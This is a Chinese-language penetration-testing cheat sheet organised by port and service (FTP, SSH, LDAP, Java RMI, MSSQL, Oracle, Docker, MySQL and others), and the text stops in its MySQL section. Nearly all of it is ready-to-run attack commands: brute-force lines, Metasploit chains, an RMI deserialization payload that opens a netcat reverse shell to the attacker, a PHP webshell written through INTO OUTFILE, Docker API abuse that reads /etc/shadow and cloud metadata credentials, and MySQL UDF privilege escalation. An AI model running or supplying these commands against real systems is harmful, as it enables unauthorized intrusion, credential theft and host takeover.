服务渗透指北

发表于 分类于
本文记录各类服务渗透思路、方法

本文涉及内容,仅限于网络安全从业者学习交流,切勿用于非法用途…

端口渗透表

端口 服务 漏洞/渗透
21 ftp/vsftpd文件传输协议 爆破/嗅探/文件上传/后门
22 ssh远程连接 爆破/代理转发
23 Telnet远程连接 爆破/嗅探
25 SMTP邮件服务 邮件伪造
53 DNS域名解析系统 DNS区域传输/劫持/ 隧道
67/68 dhcp服务 劫持/欺骗
69 tftp(简单文件传输协议) 尝试下载目标重要配置文件
110 pop3 爆破/嗅探
137/139/445 SMB(NETBIOS协议) 爆破/未授权访问/远程代码执行
143 IMAP(邮件访问协议) 爆破
161 SNMP(简单网络管理协议) 爆破/搜集目标内网信息
389 LDAP(轻量目录访问协议 ) 注入/未授权访问/弱口令/匿名访问
512/513/514 Linux Rexec服务 爆破/Rlogin登陆
873 Rsync服务 文件上传/匿名访问
1080 socket 爆破/内网渗透
1098/1099 JAVA RMI 反序列化远程命令执行漏洞
1194 openvpn 获取vpn账号,进内网
1352 Lotus domino邮件服务 爆破/弱口令/信息泄漏
1433 mssql 爆破/注入攻击/提权/sa弱口令
1500 ispmanager主机控制面板 弱口令
1521-1529 Oracle 注入攻击/TNS爆破/弹shell
1723 PPTP(点对点隧道协议 ) 爆破/获取vpn账号,进内网
2049 NFS服务 配置不当
2082,2083 cPanel主机管理面板登录 弱口令
2181 zookeeper服务 未授权访问
2375-2376 Docker Remote API 未授权访问
2601,2604 zebra路由 默认密码zerbra
3128 squid代理服务 弱口令
3306 MySQL 爆破/注入/拒绝服务/提权
3389 RDP远程桌面连接 爆破/shift后门/ms12-020
3690 svn服务 svn泄露/未授权访问
4848 GlassFish控制台 爆破/认证绕过
5000 Docker Redistry 未授权访问
5432 PostgreSQL 爆破/注入/缓冲区溢出
5306 Kibana 未授权访问
5900,5901,5902 vnc 弱口令爆破
5984 CouchDB 未授权访问导致任意指令执行
6379 Redis数据库 未授权访问/远程命令执行
6443 Kubernetes API Server 未授权访问
7001/7002 WebLogic java反序列化/控制台弱口令/控制台上传webshell/SSRF
80-89,443 http/https web应用漏洞/OpenSSL心脏滴血
8000 JDWP 远程命令执行漏洞
8009 AJP 远程代码执行
8069 Zabbix服务 远程命令执行/注入
8080-8089 Jboss/Tomcat/Jenkins/Resin/Jetty 控制台弱口令/反序列化/RCE
8083/8086 InfluxDB 未授权访问
8161 ActiveMQ 弱口令/任意文件写入/反序列化
9000 FastCGI 远程命令执行
9080-9081,9090 Websphere控制台 java反序列化/弱口令
9200/9300 ElasticSearch 未授权访问/远程代码执行
11211 Memcached 未授权访问
15672 RabbitMQ 弱口令
27017/27018 MongoDB 未授权访问/爆破
50000 SAP 远程代码执行
50030,50060,50070,50075,50090 Hadoop 默认端口未授权访问

21-FTP

1
2
3
nc -vn <IP> 21

telnet -n {IP} 21

匿名登录

1
2
3
4
5
6
7
ftp <IP>
>anonymous
>anonymous
>ls -a  # List all files (even hidden) (yes, they could be hidden)
>binary #Set transmission to binary instead of ascii
>ascii  #Set transmission to ascii instead of binary
>bye    #exit

文件下载

1
2
wget -m ftp://anonymous:[email protected]     #Donwload all
wget -m --no-passive ftp://anonymous:[email protected] #Download all

浏览器连接

1
ftp://anonymous:[email protected]

渗透方式

1
2
3
4
5
6
7
8
1) nmap ftp
nmap --script ftp-* -p 21 {IP}

2) Hydra Brute Force
hydra -t 1 -l {Username} -P {Big_Passwordlist} -vV {IP} ftp

3) consolesless mfs enumeration ftp
msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' &&  msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS {IP}; set RPORT 21; run; exit'

暴力破解

1
2
3
hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp

refer:

22-SSH/SFTP

Banner抓取

1
nc -vn <IP> 22

认证方式

1
ssh -v ip -p port

公钥收集

1
ssh-keyscan -t rsa <IP> -p <PORT>

Nmap 渗透

1
2
3
4
5
nmap -p22 <ip> -sC   # 使用默认脚本
nmap -p22 <ip> -sV   # 检索版本
nmap -p22 <ip> --script ssh2-enum-algos   # 检索支持的算法
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full     # 检索弱密钥
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # 检查认证方式

Msf 渗透

1
msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'

暴力破解

1
2
3
4
5
msf> use scanner/ssh/ssh_enumusers
hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'

refer:

23-Telnet

Banner抓取

1
2
3
nc -vn <IP> 23

nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>

渗透攻击

1
2
3
nmap -n -sV -Pn --script "*telnet*" -p 23 {IP}

msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'

暴力破解

1
2
3
hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet

refer:

53-DNS

Banner抓取

1
2
3
dig version.bind CHAOS TXT @DNS

nmap -n -sV -Pn --script dns-nsid -p 53 {IP}

域传送

1
2
3
dig axfr @<DNS_IP>           # 尝试无域名的域传送
dig axfr @<DNS_IP> <DOMAIN>  # 域传送猜解域名
fierce --domain <DOMAIN> --dns-servers <DNS_IP>  # 尝试对每个权威服务器执行域传输,如不行则发起字典攻击

Dig 利用

1
2
3
4
5
6
7
8
9
10
dig ANY @<DNS_IP> <DOMAIN>     #Any information
dig A @<DNS_IP> <DOMAIN>       #Regular DNS request
dig AAAA @<DNS_IP> <DOMAIN>    #IPv6 DNS request
dig TXT @<DNS_IP> <DOMAIN>     #Information
dig MX @<DNS_IP> <DOMAIN>      #Emails related
dig NS @<DNS_IP> <DOMAIN>      #DNS that resolves that name
dig -x 192.168.0.2 @<DNS_IP>   #Reverse lookup
dig -x 2a00:1450:400c:c06::93 @<DNS_IP> #reverse IPv6 lookup

#Use [-p PORT]  or  -6 (to use ivp6 address of dns)

DNS反向爆破

1
2
3
4
dnsrecon -r 127.0.0.0/24 -n <IP_DNS>  #DNS reverse of all of the addresses
dnsrecon -r 127.0.1.0/24 -n <IP_DNS>  #DNS reverse of all of the addresses
dnsrecon -r <IP_DNS>/24 -n <IP_DNS>   #DNS reverse of all of the addresses
dnsrecon -d active.htb -a -n <IP_DNS> #Zone transfer

子域名爆破

1
2
dnsrecon -D subdomains-1000.txt -d <DOMAIN> -n <IP_DNS>
dnscan -d <domain> -r -w subdomains-1000.txt #Bruteforce subdomains in recursive way, https://github.com/rbsec/dnscan

渗透攻击

1
2
3
nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" {IP}

msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; set RPORT 53; run; exit' && msfconsole -q -x 'use auxiliary/gather/enum_dns; set RHOSTS {IP}; set RPORT 53; run; exit'

refer:

69-TFTP

服务枚举

1
nmap -n -Pn -sU -p69 -sV --script tftp-enum <IP>

下载上传

1
2
3
4
5
6
7
8
msf5> auxiliary/admin/tftp/tftp_transfer_util

---

import tftpy
client = tftpy.TftpClient(<ip>, <port>)
client.download("filename in server", "/tmp/filename", timeout=5)
client.upload("filename to upload", "/local/path/file", timeout=5)

389/636-LDAP

服务指纹

1
2
3
4
5
389(ldap) and 636(ldaps)

PORT    STATE SERVICE REASON
389/tcp open  ldap    syn-ack
636/tcp open  tcpwrapped

服务枚举

1
2
3
nmap -n -sV --script "ldap* and not brute" <IP>   #Using anonymous credentials

nmap -p 389 --script ldap-search -Pn {IP}

数据写入

1
2
3
4
5
6
7
8
>>> import ldap3
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
True
>>> connection.extend.standard.who_am_i()
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})

信息转储

1
2
pip3 install ldapdomaindump 
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]

暴力破解

1
2
3
nmap --script ldap-brute -p 389 <IP>

hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f

凭证攫取

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
1)检查空凭证或凭证是否有效

ldapsearch -x -h <IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"

2)信息提取

ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"
-x Simple Authentication
-h LDAP Server
-D My User
-w My password
-b Base site, all data from here will be given

提取用户
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
#Example: ldapsearch -x -h <IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"

提取计算机
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TDL>"

提取my info
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"

提取域管理员
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"

提取域用户
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"

提取企业管理员
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"

提取管理员
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TDL>"

提取远程桌面组
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TDL>"

refer:

512-514: Rexec/Rlogin/Rsh

指纹特征

1
2
3
4
5
6
7
8
9
1) Rexec: 允许在主机内执行命令

PORT    STATE SERVICE
512/tcp open  exec

2) Rlogin/Rsh: 旧版远程登录

PORT    STATE SERVICE
513/tcp open  login

常用命令

1
2
3
4
5
6
rlogin <IP> -l <username>

rsh <IP> <Command>
rsh <IP> -l domain\user <Command>
rsh domain/user@<IP> <Command>
rsh domain\\user@<IP> <Command>

暴力破解

1
2
3
4
5
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V

hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V

hydra -L <Username_list> rsh://<Victim_IP> -v -V

873-Rsync

Banner抓取

1
nc -vn <IP> 873

服务枚举

1
2
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list

暴力破解

1
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>

攻击利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
1)列举分享模块

rsync -av --list-only rsync://192.168.0.123/shared_name

2)下载文件

rsync -av --list-only rsync://[email protected]/shared_name
rsync -av rsync://[email protected]:8730/shared_name ./rsyn_shared

3)上传文件

rsync -av home_user/.ssh/ rsync://[email protected]/home_user/.ssh

4)寻找配置文件

find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)

1080-Socks

认证检查

1
nmap -p 1080 <ip> --script socks-auth-info

暴力破解

1
2
3
nmap --script socks-brute -p 1080 <ip>

nmap  --script socks-brute --script-args userdb=users.txt,passdb=rockyou.txt,unpwdb.timelimit=30m -p 1080 <ip>

端口转发

1
2
3
4
vim /etc/proxychains4.conf
socks5 10.10.10.10 1080

socks5 10.10.10.10 1080 username password  #使用认证

refer: https://book.hacktricks.xyz/tunneling-and-port-forwarding

1098-1099: Java RMI

服务指纹

1
2
3
4
5
6
7
Default port: 1090,1098,1099,1199,4443-4446,8999-9010,9999

PORT      STATE SERVICE      VERSION
1090/tcp  open  ssl/java-rmi Java RMI
9010/tcp  open  java-rmi     Java RMI
37471/tcp open  java-rmi     Java RMI
40259/tcp open  ssl/java-rmi Java RMI

攻击利用

1
2
3
4
5
6
7
8
9
10
11
12
13
1)服务枚举

rmg enum {IP} {PORT}

2)暴力破解

rmg guess {IP} {PORT}

3)反序列化攻击

rmg serial 172.17.0.2 9010 CommonsCollections6 'nc 172.17.0.1 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)"

nc -vlp 4444

refer:

1433-MSSQL

信息收集

1
2
3
4
5
6
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
msf> use auxiliary/scanner/mssql/mssql_ping

searchsploit "microsoft sql server"
nmap --script-help "*ms* and *sql*"
msf> search mssql

Meatsploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used

#Steal NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder

#Info gathering
msf> use admin/mssql/mssql_enum #Security checks
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

#Search for insteresting data
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf

#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin

#Code execution
msf> use admin/mssql/mssql_exec #Execute commands
msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload

#Add new admin user from meterpreter session
msf> use windows/manage/mssql_local_auth_bypass

暴力破解

1
2
3
4
5
6
#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be carefull with the number of password in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be carefull, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT

refer:

1521-1529: Oracle TNS

服务指纹

1
1521/tcp open  oracle-tns    Oracle TNS Listener

版本枚举

1
2
3
4
5
6
7
nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>
msf> use auxiliary/scanner/oracle/tnslsnr_version

#apt install tnscmd10g
tnscmd10g version -p 1521 -h <IP>

hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener

SID枚举

1
2
3
4
5
6
7
8
9
10
11
tnscmd10g status-p 1521 -h <IP> #The SID are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)

#msf1
msf> use auxiliary/scanner/oracle/sid_enum
msf> set rhost <IP>
msf> run
#msf2
msf> use auxiliary/admin/oracle/tnscmd
msf> set CMD (CONNECT_DATA=(COMMAND=STATUS))
msf> set rhost <IP>
msf> run #The SID are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)

SID爆破

1
2
3
4
5
hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 <IP> oracle-sid
patator oracle_login host=<IP> sid=FILE0 0=sids-oracle.txt -x ignore:code=ORA-12505
./odat.py sidguesser -s $SERVER -d $SID --sids-file=./sids.txt
msf> use auxiliary/admin/oracle/sid_brute #This will use the list located at /usr/share/metasploit-framework/data/wordlists/sid.txt
nmap --script +oracle-sid-brute -p 1521 10.11.1.202 #This will use the list lcated at /usr/share/nmap/nselib/data/oracle-sids

暴力破解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017

./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt

#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>

#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>

#nmap fails sometimes for some reson executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>

登录连接

1
2
3
4
5
6
sqlplus <username>/<password>@<ip_address>/<SID>;

sqlplus <username>/<password>@<ip_address>:<port>/<SID>;       #非标准端口

sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba';  #高权限账户
#Example: sqlplus SYSTEM/[email protected]/ORCL 'as sysdba'

自动扫描

1
2
3
4
5
6
7
8
9
10
1)oscanner
#apt install oscanner
oscanner -s <IP> -P <PORT>

2)odat
git clone https://github.com/quentinhardy/odat.git
cd odat
./odat.py --help
./odat.py all -s <IP> -p <PORT>
./odat.py all -s <IP> -p <PORT> -d <SID> #To bruteforce accounts for that SID

代码执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
安装ODAT

git clone https://github.com/quentinhardy/odat.git
cd odat
./odat.py #It shouldn't be problems in Kali

1)通过JAVA存储过程执行代码
./odat.py java -s <IP> -U <username> -P <password> -d <SID> --exec COMMAND

2)通过定时器执行代码
./odat.py dbmsscheduler -s <IP> -d <SID> -U <username> -P <password> --exec "C:\windows\system32\cmd.exe /c echo 123&gt;&gt;C:\hacK"

3)通过外部表执行代码
./odat.py externaltable -s <IP> -U <username> -P <password> -d <SID> --exec "C:/windows/system32" "calc.exe"

refer:

2049-NFS

指纹/配置

1
2
3
4
2049/tcp open  nfs     2-3 (RPC #100003

/etc/exports
/etc/lib/nfs/etab

服务枚举

1
2
3
nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 {IP}

MSF: scanner/nfs/nfsmount #Scan NFS mounts and list permissions

挂载利用

1
2
3
4
5
6
7
8
showmount -e <IP>   #列举可挂载文件夹

方式一:
mount -t nfs [-o vers=2] <ip>:<remote_folder> <local_folder> -o nolock

方式二:
mkdir /mnt/new_back
mount -t nfs [-o vers=2] 10.12.0.150:/backup /mnt/new_back -o nolock

NFSShell

权限提升

2375-2376: Docker

服务枚举

1
2
3
4
5
6
7
1)使用curl

curl -s http://open.docker.socket:2375/version | jq #Get version

2) 使用docker

docker -H open.docker.socket:2375 version #Get version

攻击利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
1) 快速提权

docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash

2) 2376-TLS连接

  #List containers
  curl –insecure https://tlsopen.docker.socket:2376/containers/json | jq

  #List processes inside a container
  curl –insecure https://tlsopen.docker.socket:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq

  #Set up and exec job to hit the metadata URL
  curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}'

  #Get the output
  curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}'

  # list secrets (no secrets/swarm not set up)
  curl -s –insecure https://tlsopen.docker.socket:2376/secrets | jq

  #Check what is mounted
  curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}'

  #Get the output by starting the exec
  curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d '{}'

  #Cat the mounted secret
  curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}'

  #List service (If you have secrets, it’s also worth checking out services in case they are adding secrets via environment variables)
  curl -s –insecure https://tls-opendocker.socket:2376/services | jq

  #Creating a container that has mounted the host file system and read /etc/shadow
  curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}'
  curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start?name=test
  curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}'
  curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d '{}'

  #Stop the container
  curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stop

  #Delete stopped containers
  curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune
  
3) 自动化

msf> use exploit/linux/http/docker_daemon_tcp
nmap -sV --script "docker-*" -p <PORT> <IP>

容器逃逸

1
2
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cat /mnt/etc/shadow

refer:

3128-Squid

服务指纹

1
2
PORT     STATE  SERVICE      VERSION
3128/tcp open   http-proxy   Squid http proxy 4.11

Web代理

1
2
# Try yo proxify curl
curl --proxy http://10.10.11.131:3128 http://10.10.11.131

Nmap代理

1
2
3
proxichains.conf file: http 10.10.10.10 3128

proxychains nmap -sT -n -p- localhost

3306-Mysql

连接

1
2
3
4
5
6
7
8
9
1)本地连接

mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

2)远程连接

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

服务枚举

1
2
3
4
5
6
7
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump 	#Creds
msf> use auxiliary/admin/mysql/mysql_enum 				#Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds 
msf> use exploit/windows/mysql/mysql_start_up 		#Execute commands Windows, Creds

暴力破解

1
2
3
4
5
6
7
8
# hydra
hydra -L usernames.txt -P pass.txt <IP> mysql

# msfconsole
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false

# medusa
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql

命令执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
show databases;
use <database>;
show tables;
describe <table_name>;

select grantee, table_schema, privilege_type FROM schema_privileges; #Exact privileges
select user,file_priv from mysql.user where user='root'; #File privileges
select version(); 	#version
select @@version(); #version
select user(); 			#User
select database(); 	#database name

#Try to execute code
select do_system('id');
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;

mysql -u username -p < manycommands.sql   #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

权限提升

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
1)Current Level of access

mysql>select user();
mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';

2)Access passwords

mysql> use mysql
mysql> select user,password from user;

3)Create a new user and grant him privileges

mysql>create user test identified by 'test';
mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

4)Break into a shell

mysql> \! cat /etc/passwd
mysql> \! bash

UDF提权

1
2
3
4
5
6
7
8
# locate lib_mysqludf_sys.so

use mysql;
create table npn(line blob);
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
select * from npn into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
select sys_exec('id > /tmp/out.txt');

凭证获取

1
2
3
4
SELECT User,Host,Password FROM mysql.user;
